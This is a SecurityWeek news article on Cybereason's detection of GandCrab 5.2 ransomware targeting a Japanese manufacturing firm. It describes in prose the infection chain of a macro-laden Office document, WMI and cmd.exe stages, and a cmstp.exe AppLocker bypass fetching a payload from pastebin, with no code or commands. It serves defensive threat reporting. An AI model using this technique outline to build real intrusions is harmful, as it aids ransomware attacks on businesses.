Security Experts:

Connect with us

Hi, what are you looking for?



GandCrab Ransomware Detected Targeting Manufacturing Firm

GandCrab, once known as a consumer-targeting ransomware, is increasingly being used in attacks against business organizations

GandCrab, once known as a consumer-targeting ransomware, is increasingly being used in attacks against business organizations

2018 was dominated by two strains of malware: GandCrab for consumers and SamSam for businesses. Both were hugely successful for the hackers — GandCrab for its continuous development and relatively low cost; and SamSam because of its developers’ ability to infiltrate and cripple large networks.

Since the end of 2018, with the U.S. indictment of two Iranian citizens for their involvement with SamSam, it has all but disappeared. The business model of infecting larger organizations for a larger payout remains attractive — and GandCrab is beginning to be used by other actors against business. Now Cybereason has detected a new example, with a new evasive infection chain, with GandCrab targeting an unnamed Japanese manufacturing business.

The Norsk Hydro incident in March 2019 demonstrates how effective a successful ransomware attack against manufacturing can be. Although it did not penetrate the OT side of Norsk’s systems, it still shut down plants by disrupting the means of controlling them. The incident has cost the firm approximately $52 million. The cost will be much higher if the ransomware penetrates the OT side of the corporate network — as WannaCry did at Taiwan chip manufacturer TSMC. WannaCry cost TSMC an estimated $250 million.

Criminals bank on manufacturers’ willingness to pay perhaps a few hundred thousand dollars rather than face costs of millions of dollars — as Jackson County, Georgia, did when infected by the Ryuk ransomware.

GandCrab is ransomware-as-a-service. As soon as security firms develop a decryptor, the developers produce a new version. At the time of the attack against the Japanese firm, there is no way to recover GandCrab encrypted files without paying the ransom (or recovering from backups).

This new attack starts with a poisoned Korean Office document. The poison is an embedded and obfuscated macro that is triggered by GotFocus. A multi-stage downloader is decrypted resulting a WMI object that spawns a cmd.exe instance with more commands. It produces an INF configuration file that uses a variation of the Squiblydoo technique (using cmstp.exe) to bypass Windows AppLocker.

cmstp.exe connects to to download a secondary payload — a scriptlet containing obfuscated JavaScript code that contains GandCrab. This is decrypted and dropped at runtime.

“The [pastebin] URL and the page content seem to be undetected by antivirus vendors on VirusTotal,” say the researchers, suggesting that detection of this attack requires behavioral analysis rather than signature detection. The ransom note produced by a successful attack states that the malware is GandCrab version 5.2. Decryptors are currently available only for versions 1, 4 and 5 up to 5.1.

The relatively new use of GandCrab against business is not an indication of a change of policy from the developers. Since leasing the ransomware is a service they offer, it is still available to the less skilled hackers who use spray and pray delivery against consumers. 

“Also, since GandCrab is a RaaS model, the threat actors who ‘lease’ the service, can target whomever they want. So, it’s difficult to assign collective intention/trend, since we are talking about an unknown number of potential threat actors,” Assaf Dahan, Cybereason’s senior director, head of threat research, told SecurityWeek. However, its growing adoption by more skilled hackers is a new threat to business.

“There have been many large enterprises and recognizable corporate brands hit by ransomware in the past year, some in the manufacturing industry,” continued Dahan. “In general, the threat actors are carrying out more targeted campaigns against many companies across a wide spectrum of industries. A persistent, motivated hacker will eventually succeed in breaking through a corporate defense, making it critical for enterprises to be able to respond quickly, to turn back the threat. Any significant latency in the time of breach and response leads to trouble.”

Related: SamSam and GandCrab Illustrate Evolution of Ransomware 

Related: GandCrab: The New King of Ransomware? 

Related: GandCrab Ransomware Spreads Via NSA Exploit 

Related: Malware Activity Slows, But Attacks More Sophisticated: Report

Written By

Kevin Townsend is a Senior Contributor at SecurityWeek. He has been writing about high tech issues since before the birth of Microsoft. For the last 15 years he has specialized in information security; and has had many thousands of articles published in dozens of different magazines – from The Times and the Financial Times to current and long-gone computer magazines.

Click to comment

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join this webinar to learn best practices that organizations can use to improve both their resilience to new threats and their response times to incidents.


Join this live webinar as we explore the potential security threats that can arise when third parties are granted access to a sensitive data or systems.


Expert Insights

Related Content


Zendesk is informing customers about a data breach that started with an SMS phishing campaign targeting the company’s employees.


The release of OpenAI’s ChatGPT in late 2022 has demonstrated the potential of AI for both good and bad.


Satellite TV giant Dish Network confirmed that a recent outage was the result of a cyberattack and admitted that data was stolen.


The changing nature of what we still generally call ransomware will continue through 2023, driven by three primary conditions.

Application Security

PayPal is alerting roughly 35,000 individuals that their accounts have been targeted in a credential stuffing campaign.


No one combatting cybercrime knows everything, but everyone in the battle has some intelligence to contribute to the larger knowledge base.


A recently disclosed vBulletin vulnerability, which had a zero-day status for roughly two days last week, was exploited in a hacker attack targeting the...


As it evolves, web3 will contain and increase all the security issues of web2 – and perhaps add a few more.